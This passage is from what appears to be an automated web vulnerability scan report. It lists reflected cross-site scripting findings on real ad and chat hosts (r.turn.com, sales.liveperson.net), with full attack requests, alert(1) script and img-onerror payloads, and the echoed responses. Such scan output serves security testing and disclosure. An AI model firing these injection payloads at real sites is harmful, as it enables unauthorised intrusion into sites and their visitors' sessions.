pf=QNmKTCt50B8Kpjg3isR9W_Ir3yoWOiSMkKJqMqoVPY2F1SOb8aRLeTLNl-G3fsUKhUysT6tP_1ec7xFTzmyTOvZhkC75wKwc88nuAokFvQ9ZYY2MlOzDLPTu4F-Uvdt_4YcdqwNhq09cj3lKBwXbCI3NqI2oQask0RxIcweDv6GMvGOoSAiXlEejBUI4bVTZiG0CD7SN4iQwbZFOht5_PcUKhyzjZJcScR_VHmzU_n_fhPhtP5eGOnqRNnt1-OV92xXlB7VgscrJbhGIf_JilPRDCeImrEZCGkpU4h_63CxWG5zEusESadpgYRYL2p5MG_RdoPtoKDEjrNYQG7__lKjDMABh_QQeaoDba2RSMKg6e-hV0PbjfU-R5RsfY_iXHHJjlc65ejsfGk_Bhi8TLHmektSTNGWFbueds9H23VJFfVN5kj-_puNaGveyJPzS0OWMGE9a6E0drdXZhYMeXsC4vcynPn9Dotf0EEwoLz7AbGDzP165MyHrx4tSx2B8O9qIPoIdnpPJQCQT3fsKxMAWYsdDJ5k_sdNi8uFJSCQ255k6vYnNOgM7sltoObfRe7Nfdm5bvla8XcCi8mpJcxR9SWcdexG9cU6HZV_VJhdn40SIet0iwwqKbdSj4CL2bkG8vxygw5PYjAzgbfXuQGcN6QW2n8XRLy7UoAmSdBRnwSKp2TDgd2Lcz_qJvz2UQIXGjoBZ78Wshqhm4tb0CSAVFfu30wLyYuo1y7aS82LTLnxA3ggK2gyTUssar2d0VZEEXq24P2id3ypkSYZxDaGrEW4mATCBJcdbUsS6U6WlB0V5Jnrj8cA_1KNYNCmayGOF0nn5E6TLc-A2frbzWLZ78bJLnb6L0KoAtnvLV2pP81X4ANdqArViOJeQtd_KBgfW6zrQLmaDIleZdb-lWXaspIKRhbM6EZgcd53-A29aOa0ye1UD40069XkSXwnuCh-RAXxtefbOimbdrtxWQwySgP2B497OTuJjk4h_xz7h1RsCnD2sD6SzTA6FS0L5qaDwuUB-gusjbKGTbdorNQKIus_NVuwacB_n_GJkCjDeRWnTTHOTAUzRX7jz2Dtha6IYgwK4KHy8_huNe8GKEihRoyUkOlvRlegTV48BDCOJkf60Zr6_RPbt9P03q9zqXbkMIiHhRyraLmWVTI7LPDO0V_cWY7-ccITIWG4cEAVOX3OaMNRzdBC4-0RsvFyXuRiJhp9j10eguQj26V8UKLkQP0cLS8-CaS_G0biaU-lkiE1m1Xn_hKe9NfZLnwyCK2ncrj6VabuuuFr6c_o5qaCQ6oN7sH1l3MIGQoK8X6stp0kTmdEXBwprTQawoH105HoGs1Q83lthTB7Fi-VTyyXy_vCtpJySQt4PX48ZzIpuwEShzbmTtAHP6iCkM-HhsMYZ7YWC2tZwu4Tb45eBwQ2XRr6BMB9fSsap5sDS6rpQ2bGi-sM44BgEdgBbOlmMluxfbyihgyJXJzx1jJXLpuPXHdjanaO2pJ8yqKNT5UMTIw2oYtTZbgmSLFmFfbvQzRfufLqyfgPcMtBAkmyxKq4X6cfi80nt471PDAY1h5rLy4hs1GeJifs51BsOk2bX; rv=1; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 20 Mar 2011 14:01:59 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("");
   }
</script>
<body>
<img height=0 width=0 style="visibility:hidden" src="http:/ad.yieldmanager.com1eb6e"><script>alert(1)</script>dcf94b4096f/clk" onerror="processAdClickUrl();" onload="processAdClickUrl();">
...[SNIP]...

1.129. http://r.turn.com/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96047"><script>alert(1)</script>68d3736c53 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk96047"><script>alert(1)</script>68d3736c53 HTTP/1.1
Host: r.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=8392341830659049202; adImpCount=aWm1M4LjK5VIpxyiby4XYxEDYW1PshQ3vpBZa8uxHEph-L3XcPmT4hHXOQgApIlYh1NXgtHFGzzHzNFmm-KzX_9FnfDLNktuAMS6JsTomdlVpY3HjWkw231zQDelLH8_7MDefgoTZqF-bd3v_Qfs6OEZRtFGqduPVkD_gkg8VfV0ExsZAquLx2WiGNWvrnUszuICt27wBWASQBET6OeAytEy0WeBXOvyGLo3g2RyRxPMuJkSor3PooeE5HOb8MagG3H1Yh6KJus8Al0Tyl-_P0B_pSthw6Osds3vCU1DTz-z4otjDK2ixFI9HIYofu_jbt-1znRWuv4f0NnBSjg_DEGifQpKlSlg2JPncxaZQ7rJS-D340zJ0KEew_mwtQGaH27SKaSCTrWZJYQAanRpUpKgERJUW1YdGsZik0-okt7FAHdoDG0wmwYyeCzPe0spi39LGtEsLYa2RHjeXVKaXwxjz621UnXRIPElrss_9Bf3D5kPD76YDvIMjmnYUSqxgxaji_-otMFqmG9mmaQliekdOq3dCdMpBBYB6oxrLl9pdFEKrE3dKUxNz_PPP_A0oljWnUH_uUv0DheX3sKsfdGakli0ckXet5HgWuGAxOwjSx4LjXgDbmHu6Eh19fbovGRasNivyUiC-5nZMh1vJZclJZpWuXGcTDMvl_OekRPjS2MhCKHwMNU_BYoLCyOP7MDefgoTZqF-bd3v_Qfs6KVd2oSKolIwwEiITDQU2Lx0ExsZAquLx2WiGNWvrnUsd_PYU2DwATVpcslEDyf8hqiet1AIT80-jJlBpoUU7boLVM3uUWyLgHu6saG6i5PsBUqFp4KiueJFiSLkI0xYhQXlpwfxpWQdK7j4LVji2FVRCmp-Ng4uMeq-zvqbvux36ic_sEQwn-Xt_ClqlX8t_6DGXbcfdjdN_4BNnqMpaZCNRQCl9OpEhGua7KdmVMA9H27SKaSCTrWZJYQAanRpUjDmKTcPQFqbSQ5GlElX4-OPXp3pozvJlBPwzvc_9CbX0Eax0_okMfml7XV2gTBl77zbnfMNJ_ejhUj1ijcB8BL3D5kPD76YDvIMjmnYUSqxVTm50zwheMZKXjYTELCaRTMB1dlAsjcT9rVrLvj2jmVUL-jDhuW_PG6kDXW49rX2tzfWChaLz8qHVMsj8mXTQ5X_BsIvcSN0BmMTK-BlFS19ozX7FlWqx06TTt3zJMoidpDfoquYgeQVRQJMAHbPNzKbdG5BDLNqFInvCReDtR22Ma4NnjcBIUkCx_bHhhCO7MDefgoTZqF-bd3v_Qfs6BrVkQpn3sMfisSjNFR6Lph0ExsZAquLx2WiGNWvrnUsxG4zdt6QMXamb0MlO9-6e1Et3epiS-kFwEUk3ma5DYQLVM3uUWyLgHu6saG6i5PsCif1zoSmfZSqcudOf2tI_AtUze5RbIuAe7qxobqLk-whOajgwxbhQ2etCzicpyVTBeWnB_GlZB0ruPgtWOLYVT4g_J2kF4TffMfKOos7tSGYqdD0JO4s0XymPmMJRJDcQaJ9CkqVKWDYk-dzFplDuqwCXV-t7S-pFZ84tfYt394fbtIppIJOtZklhABqdGlSk3kOykyDTiOMXrl_1hSXbVPgP28vTqELfpOybpGjlbL1u2jaCL-G-9iQxe-i1zj0qnIvgJ1Cs1GitaawX0kTqPcPmQ8PvpgO8gyOadhRKrGUhUdZl_uWemjmxoBkqtZPlC4l-GnLAeLfqIKDfL1UZBu13BiEoKhy1nfBN8OlmthGyJL9eBp3R0ktcXzadt6Dlf8Gwi9xI3QGYxMr4GUVLSGbq4jqoA2S5xXIqloiZ1rJnlvqvTZp82d7AV1or2dUFOEFVYJjQMgMb7lS0C-xbKEPGbIcW-yfL1eczIB0nv7swN5-ChNmoX5t3e_9B-zo4ADEFwcAd4j4QaxZfExMqHQTGxkCq4vHZaIY1a-udSxde4MjDw009tPzSo6eSSgxdwNGJND06t-bjtn5J7KDlQtUze5RbIuAe7qxobqLk-zD_xVADK1Q9dfnRiJgoiDiBeWnB_GlZB0ruPgtWOLYVWRtxKwDSHoQbxPxzfXop_PGqBSQ6KpYW-OwrvDg8i80oMZdtx92N03_gE2eoylpkOa03F8PGEVyWKeOTLdjQBsfbtIppIJOtZklhABqdGlSTAOVu8HAwVUaLipJ9sHGrk8xcWupMSKM_8JiETgP7y2Lf0sa0SwthrZEeN5dUppfBHqNpdRWaYXKfEufY1_jM_cPmQ8PvpgO8gyOadhRKrEH2jhGaC4HJh3Lvv-bHhjZXJrqY1uo21_GLL5pntP7d1Qv6MOG5b88bqQNdbj2tfZUQpq4yPuFsSVWlf6dSHtGLEWhr4abofxDhC7P6sGwew4euBkqrCOJYGXaH5f2No8_2RdAhJaMbFOWHdRsIhatZ3trG8hf0eQqY8g-UGnErVl0dXhBHCfFaURcg86EWtLlFbsvCmEPdz0GvB-V7jB5awi2yagXokGer-T3duHYImsItsmoF6JBnq_k93bh2CJrCLbJqBeiQZ6v5Pd24dgi0fy9yH3cJpXYWOo6nSGwttH8vch93CaV2FjqOp0hsLaOT-BQHXXH-uznhhEs9x_Sw0tfzF6HcwwheEdKac2B-sNLX8xeh3MMIXhHSmnNgfoM2KaPI-sR5WE58gV6S3h5xnv5U9q3RmUdEcfcdtut4fcJCZU_BttKMXTDyrBfshtsU5_j_mocn2P_zfZY4qmabFOf4_5qHJ9j_832WOKpmug_cxXaULqo5K_--uRzgNIR8R--H-SzG21IeFe3_WqV2oTj14ksQ27ZtJZzx1gXZNqE49eJLENu2bSWc8dYF2TahOPXiSxDbtm0lnPHWBdk9C_Pu3wPYr2A_3dDgXogwmd09iZDTMtxv05d2hJrzm1ndPYmQ0zLcb9OXdoSa85tfCWfACzyR22c78m9rm0opXwlnwAs8kdtnO_Jva5tKKWGDrBTI6MoEsB4IrTcND0RHO90Ba4DNelbdwYVufELDtX6BfAY2sgFWzSh0EbYcfTBpmpd9hwiXKZXJsWFQCQVBsjiFrNHSK-_Gebf3rUW-DiUdeTQauTko8JT6bU5H7U4lHXk0Grk5KPCU-m1OR-1OJR15NBq5OSjwlPptTkftTiUdeTQauTko8JT6bU5H7WBDZuAVb1fiTqGwbz13XI0gQ2bgFW9X4k6hsG89d1yNIENm4BVvV-JOobBvPXdcjQoc_EAqGm2Vr9TWaHYU9GddhjhUYi9yiSqjz4yirqEttGX0otsn1Eo9ASeAp22-RzCmJKLA4L8yqghdd3XRDx7qf1MrHd4wjjnlzZT7-OanKn9TKx3eMI455c2U-_jmpyp_Uysd3jCOOeXNlPv45qc4FfPONitGRcGxKttYjNpmYIlBZfRYA7Tno9giphEEaGCJQWX0WAO056PYIqYRBGhxo3TegpnNfA0YZyu_rcByep30ZvJV6vlji6z2sRrikTqd9GbyVer5Y4us9rEa4pE6nfRm8lXq-WOLrPaxGuKROp30ZvJV6vlji6z2sRrikRAeKyhQvuA1Am1Hf99RKswWh2QKPH2KLJ2oGR8lOZM1ANe8zLs_kHddS6hlrOxdDk; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; pf=QNmKTCt50B8Kpjg3isR9W_Ir3yoWOiSMkKJqMqoVPY2F1SOb8aRLeTLNl-G3fsUKhUysT6tP_1ec7xFTzmyTOvZhkC75wKwc88nuAokFvQ9ZYY2MlOzDLPTu4F-Uvdt_4YcdqwNhq09cj3lKBwXbCI3NqI2oQask0RxIcweDv6GMvGOoSAiXlEejBUI4bVTZiG0CD7SN4iQwbZFOht5_PcUKhyzjZJcScR_VHmzU_n_fhPhtP5eGOnqRNnt1-OV92xXlB7VgscrJbhGIf_JilPRDCeImrEZCGkpU4h_63CxWG5zEusESadpgYRYL2p5MG_RdoPtoKDEjrNYQG7__lKjDMABh_QQeaoDba2RSMKg6e-hV0PbjfU-R5RsfY_iXHHJjlc65ejsfGk_Bhi8TLHmektSTNGWFbueds9H23VJFfVN5kj-_puNaGveyJPzS0OWMGE9a6E0drdXZhYMeXsC4vcynPn9Dotf0EEwoLz7AbGDzP165MyHrx4tSx2B8O9qIPoIdnpPJQCQT3fsKxMAWYsdDJ5k_sdNi8uFJSCQ255k6vYnNOgM7sltoObfRe7Nfdm5bvla8XcCi8mpJcxR9SWcdexG9cU6HZV_VJhdn40SIet0iwwqKbdSj4CL2bkG8vxygw5PYjAzgbfXuQGcN6QW2n8XRLy7UoAmSdBRnwSKp2TDgd2Lcz_qJvz2UQIXGjoBZ78Wshqhm4tb0CSAVFfu30wLyYuo1y7aS82LTLnxA3ggK2gyTUssar2d0VZEEXq24P2id3ypkSYZxDaGrEW4mATCBJcdbUsS6U6WlB0V5Jnrj8cA_1KNYNCmayGOF0nn5E6TLc-A2frbzWLZ78bJLnb6L0KoAtnvLV2pP81X4ANdqArViOJeQtd_KBgfW6zrQLmaDIleZdb-lWXaspIKRhbM6EZgcd53-A29aOa0ye1UD40069XkSXwnuCh-RAXxtefbOimbdrtxWQwySgP2B497OTuJjk4h_xz7h1RsCnD2sD6SzTA6FS0L5qaDwuUB-gusjbKGTbdorNQKIus_NVuwacB_n_GJkCjDeRWnTTHOTAUzRX7jz2Dtha6IYgwK4KHy8_huNe8GKEihRoyUkOlvRlegTV48BDCOJkf60Zr6_RPbt9P03q9zqXbkMIiHhRyraLmWVTI7LPDO0V_cWY7-ccITIWG4cEAVOX3OaMNRzdBC4-0RsvFyXuRiJhp9j10eguQj26V8UKLkQP0cLS8-CaS_G0biaU-lkiE1m1Xn_hKe9NfZLnwyCK2ncrj6VabuuuFr6c_o5qaCQ6oN7sH1l3MIGQoK8X6stp0kTmdEXBwprTQawoH105HoGs1Q83lthTB7Fi-VTyyXy_vCtpJySQt4PX48ZzIpuwEShzbmTtAHP6iCkM-HhsMYZ7YWC2tZwu4Tb45eBwQ2XRr6BMB9fSsap5sDS6rpQ2bGi-sM44BgEdgBbOlmMluxfbyihgyJXJzx1jJXLpuPXHdjanaO2pJ8yqKNT5UMTIw2oYtTZbgmSLFmFfbvQzRfufLqyfgPcMtBAkmyxKq4X6cfi80nt471PDAY1h5rLy4hs1GeJifs51BsOk2bX; rv=1; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 20 Mar 2011 14:02:04 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("");
   }
</script>
<body>
<img height=0 width=0 style="visibility:hidden" src="http:/ad.yieldmanager.com/clk96047"><script>alert(1)</script>68d3736c53" onerror="processAdClickUrl();" onload="processAdClickUrl();">
...[SNIP]...

1.130. http://r.turn.com/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6529c"><script>alert(1)</script>ccf18581832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /r/tpclick/id/tm7NsgCBljeFlAgAcwABAA/3c/http:/ad.yieldmanager.com/clk?6529c"><script>alert(1)</script>ccf18581832=1 HTTP/1.1
Host: r.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=8392341830659049202; adImpCount=aWm1M4LjK5VIpxyiby4XYxEDYW1PshQ3vpBZa8uxHEph-L3XcPmT4hHXOQgApIlYh1NXgtHFGzzHzNFmm-KzX_9FnfDLNktuAMS6JsTomdlVpY3HjWkw231zQDelLH8_7MDefgoTZqF-bd3v_Qfs6OEZRtFGqduPVkD_gkg8VfV0ExsZAquLx2WiGNWvrnUszuICt27wBWASQBET6OeAytEy0WeBXOvyGLo3g2RyRxPMuJkSor3PooeE5HOb8MagG3H1Yh6KJus8Al0Tyl-_P0B_pSthw6Osds3vCU1DTz-z4otjDK2ixFI9HIYofu_jbt-1znRWuv4f0NnBSjg_DEGifQpKlSlg2JPncxaZQ7rJS-D340zJ0KEew_mwtQGaH27SKaSCTrWZJYQAanRpUpKgERJUW1YdGsZik0-okt7FAHdoDG0wmwYyeCzPe0spi39LGtEsLYa2RHjeXVKaXwxjz621UnXRIPElrss_9Bf3D5kPD76YDvIMjmnYUSqxgxaji_-otMFqmG9mmaQliekdOq3dCdMpBBYB6oxrLl9pdFEKrE3dKUxNz_PPP_A0oljWnUH_uUv0DheX3sKsfdGakli0ckXet5HgWuGAxOwjSx4LjXgDbmHu6Eh19fbovGRasNivyUiC-5nZMh1vJZclJZpWuXGcTDMvl_OekRPjS2MhCKHwMNU_BYoLCyOP7MDefgoTZqF-bd3v_Qfs6KVd2oSKolIwwEiITDQU2Lx0ExsZAquLx2WiGNWvrnUsd_PYU2DwATVpcslEDyf8hqiet1AIT80-jJlBpoUU7boLVM3uUWyLgHu6saG6i5PsBUqFp4KiueJFiSLkI0xYhQXlpwfxpWQdK7j4LVji2FVRCmp-Ng4uMeq-zvqbvux36ic_sEQwn-Xt_ClqlX8t_6DGXbcfdjdN_4BNnqMpaZCNRQCl9OpEhGua7KdmVMA9H27SKaSCTrWZJYQAanRpUjDmKTcPQFqbSQ5GlElX4-OPXp3pozvJlBPwzvc_9CbX0Eax0_okMfml7XV2gTBl77zbnfMNJ_ejhUj1ijcB8BL3D5kPD76YDvIMjmnYUSqxVTm50zwheMZKXjYTELCaRTMB1dlAsjcT9rVrLvj2jmVUL-jDhuW_PG6kDXW49rX2tzfWChaLz8qHVMsj8mXTQ5X_BsIvcSN0BmMTK-BlFS19ozX7FlWqx06TTt3zJMoidpDfoquYgeQVRQJMAHbPNzKbdG5BDLNqFInvCReDtR22Ma4NnjcBIUkCx_bHhhCO7MDefgoTZqF-bd3v_Qfs6BrVkQpn3sMfisSjNFR6Lph0ExsZAquLx2WiGNWvrnUsxG4zdt6QMXamb0MlO9-6e1Et3epiS-kFwEUk3ma5DYQLVM3uUWyLgHu6saG6i5PsCif1zoSmfZSqcudOf2tI_AtUze5RbIuAe7qxobqLk-whOajgwxbhQ2etCzicpyVTBeWnB_GlZB0ruPgtWOLYVT4g_J2kF4TffMfKOos7tSGYqdD0JO4s0XymPmMJRJDcQaJ9CkqVKWDYk-dzFplDuqwCXV-t7S-pFZ84tfYt394fbtIppIJOtZklhABqdGlSk3kOykyDTiOMXrl_1hSXbVPgP28vTqELfpOybpGjlbL1u2jaCL-G-9iQxe-i1zj0qnIvgJ1Cs1GitaawX0kTqPcPmQ8PvpgO8gyOadhRKrGUhUdZl_uWemjmxoBkqtZPlC4l-GnLAeLfqIKDfL1UZBu13BiEoKhy1nfBN8OlmthGyJL9eBp3R0ktcXzadt6Dlf8Gwi9xI3QGYxMr4GUVLSGbq4jqoA2S5xXIqloiZ1rJnlvqvTZp82d7AV1or2dUFOEFVYJjQMgMb7lS0C-xbKEPGbIcW-yfL1eczIB0nv7swN5-ChNmoX5t3e_9B-zo4ADEFwcAd4j4QaxZfExMqHQTGxkCq4vHZaIY1a-udSxde4MjDw009tPzSo6eSSgxdwNGJND06t-bjtn5J7KDlQtUze5RbIuAe7qxobqLk-zD_xVADK1Q9dfnRiJgoiDiBeWnB_GlZB0ruPgtWOLYVWRtxKwDSHoQbxPxzfXop_PGqBSQ6KpYW-OwrvDg8i80oMZdtx92N03_gE2eoylpkOa03F8PGEVyWKeOTLdjQBsfbtIppIJOtZklhABqdGlSTAOVu8HAwVUaLipJ9sHGrk8xcWupMSKM_8JiETgP7y2Lf0sa0SwthrZEeN5dUppfBHqNpdRWaYXKfEufY1_jM_cPmQ8PvpgO8gyOadhRKrEH2jhGaC4HJh3Lvv-bHhjZXJrqY1uo21_GLL5pntP7d1Qv6MOG5b88bqQNdbj2tfZUQpq4yPuFsSVWlf6dSHtGLEWhr4abofxDhC7P6sGwew4euBkqrCOJYGXaH5f2No8_2RdAhJaMbFOWHdRsIhatZ3trG8hf0eQqY8g-UGnErVl0dXhBHCfFaURcg86EWtLlFbsvCmEPdz0GvB-V7jB5awi2yagXokGer-T3duHYImsItsmoF6JBnq_k93bh2CJrCLbJqBeiQZ6v5Pd24dgi0fy9yH3cJpXYWOo6nSGwttH8vch93CaV2FjqOp0hsLaOT-BQHXXH-uznhhEs9x_Sw0tfzF6HcwwheEdKac2B-sNLX8xeh3MMIXhHSmnNgfoM2KaPI-sR5WE58gV6S3h5xnv5U9q3RmUdEcfcdtut4fcJCZU_BttKMXTDyrBfshtsU5_j_mocn2P_zfZY4qmabFOf4_5qHJ9j_832WOKpmug_cxXaULqo5K_--uRzgNIR8R--H-SzG21IeFe3_WqV2oTj14ksQ27ZtJZzx1gXZNqE49eJLENu2bSWc8dYF2TahOPXiSxDbtm0lnPHWBdk9C_Pu3wPYr2A_3dDgXogwmd09iZDTMtxv05d2hJrzm1ndPYmQ0zLcb9OXdoSa85tfCWfACzyR22c78m9rm0opXwlnwAs8kdtnO_Jva5tKKWGDrBTI6MoEsB4IrTcND0RHO90Ba4DNelbdwYVufELDtX6BfAY2sgFWzSh0EbYcfTBpmpd9hwiXKZXJsWFQCQVBsjiFrNHSK-_Gebf3rUW-DiUdeTQauTko8JT6bU5H7U4lHXk0Grk5KPCU-m1OR-1OJR15NBq5OSjwlPptTkftTiUdeTQauTko8JT6bU5H7WBDZuAVb1fiTqGwbz13XI0gQ2bgFW9X4k6hsG89d1yNIENm4BVvV-JOobBvPXdcjQoc_EAqGm2Vr9TWaHYU9GddhjhUYi9yiSqjz4yirqEttGX0otsn1Eo9ASeAp22-RzCmJKLA4L8yqghdd3XRDx7qf1MrHd4wjjnlzZT7-OanKn9TKx3eMI455c2U-_jmpyp_Uysd3jCOOeXNlPv45qc4FfPONitGRcGxKttYjNpmYIlBZfRYA7Tno9giphEEaGCJQWX0WAO056PYIqYRBGhxo3TegpnNfA0YZyu_rcByep30ZvJV6vlji6z2sRrikTqd9GbyVer5Y4us9rEa4pE6nfRm8lXq-WOLrPaxGuKROp30ZvJV6vlji6z2sRrikRAeKyhQvuA1Am1Hf99RKswWh2QKPH2KLJ2oGR8lOZM1ANe8zLs_kHddS6hlrOxdDk; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; pf=QNmKTCt50B8Kpjg3isR9W_Ir3yoWOiSMkKJqMqoVPY2F1SOb8aRLeTLNl-G3fsUKhUysT6tP_1ec7xFTzmyTOvZhkC75wKwc88nuAokFvQ9ZYY2MlOzDLPTu4F-Uvdt_4YcdqwNhq09cj3lKBwXbCI3NqI2oQask0RxIcweDv6GMvGOoSAiXlEejBUI4bVTZiG0CD7SN4iQwbZFOht5_PcUKhyzjZJcScR_VHmzU_n_fhPhtP5eGOnqRNnt1-OV92xXlB7VgscrJbhGIf_JilPRDCeImrEZCGkpU4h_63CxWG5zEusESadpgYRYL2p5MG_RdoPtoKDEjrNYQG7__lKjDMABh_QQeaoDba2RSMKg6e-hV0PbjfU-R5RsfY_iXHHJjlc65ejsfGk_Bhi8TLHmektSTNGWFbueds9H23VJFfVN5kj-_puNaGveyJPzS0OWMGE9a6E0drdXZhYMeXsC4vcynPn9Dotf0EEwoLz7AbGDzP165MyHrx4tSx2B8O9qIPoIdnpPJQCQT3fsKxMAWYsdDJ5k_sdNi8uFJSCQ255k6vYnNOgM7sltoObfRe7Nfdm5bvla8XcCi8mpJcxR9SWcdexG9cU6HZV_VJhdn40SIet0iwwqKbdSj4CL2bkG8vxygw5PYjAzgbfXuQGcN6QW2n8XRLy7UoAmSdBRnwSKp2TDgd2Lcz_qJvz2UQIXGjoBZ78Wshqhm4tb0CSAVFfu30wLyYuo1y7aS82LTLnxA3ggK2gyTUssar2d0VZEEXq24P2id3ypkSYZxDaGrEW4mATCBJcdbUsS6U6WlB0V5Jnrj8cA_1KNYNCmayGOF0nn5E6TLc-A2frbzWLZ78bJLnb6L0KoAtnvLV2pP81X4ANdqArViOJeQtd_KBgfW6zrQLmaDIleZdb-lWXaspIKRhbM6EZgcd53-A29aOa0ye1UD40069XkSXwnuCh-RAXxtefbOimbdrtxWQwySgP2B497OTuJjk4h_xz7h1RsCnD2sD6SzTA6FS0L5qaDwuUB-gusjbKGTbdorNQKIus_NVuwacB_n_GJkCjDeRWnTTHOTAUzRX7jz2Dtha6IYgwK4KHy8_huNe8GKEihRoyUkOlvRlegTV48BDCOJkf60Zr6_RPbt9P03q9zqXbkMIiHhRyraLmWVTI7LPDO0V_cWY7-ccITIWG4cEAVOX3OaMNRzdBC4-0RsvFyXuRiJhp9j10eguQj26V8UKLkQP0cLS8-CaS_G0biaU-lkiE1m1Xn_hKe9NfZLnwyCK2ncrj6VabuuuFr6c_o5qaCQ6oN7sH1l3MIGQoK8X6stp0kTmdEXBwprTQawoH105HoGs1Q83lthTB7Fi-VTyyXy_vCtpJySQt4PX48ZzIpuwEShzbmTtAHP6iCkM-HhsMYZ7YWC2tZwu4Tb45eBwQ2XRr6BMB9fSsap5sDS6rpQ2bGi-sM44BgEdgBbOlmMluxfbyihgyJXJzx1jJXLpuPXHdjanaO2pJ8yqKNT5UMTIw2oYtTZbgmSLFmFfbvQzRfufLqyfgPcMtBAkmyxKq4X6cfi80nt471PDAY1h5rLy4hs1GeJifs51BsOk2bX; rv=1; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 20 Mar 2011 14:01:51 GMT
Connection: close

<html>
<script type="text/javascript">
   function processAdClickUrl() {
       window.top.location.replace("");
   }
</script>
<body>
<img height=0 width=0 style="visibility:hidden" src="http:/ad.yieldmanager.com/clk?6529c"><script>alert(1)</script>ccf18581832=1" onerror="processAdClickUrl();" onload="processAdClickUrl();">
...[SNIP]...

1.131. http://sales.liveperson.net/hc/53643872/ [msessionkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/53643872/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 67ae7<img%20src%3da%20onerror%3dalert(1)>84eb79ba639 was submitted in the msessionkey parameter. This input was echoed as 67ae7<img src=a onerror=alert(1)>84eb79ba639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

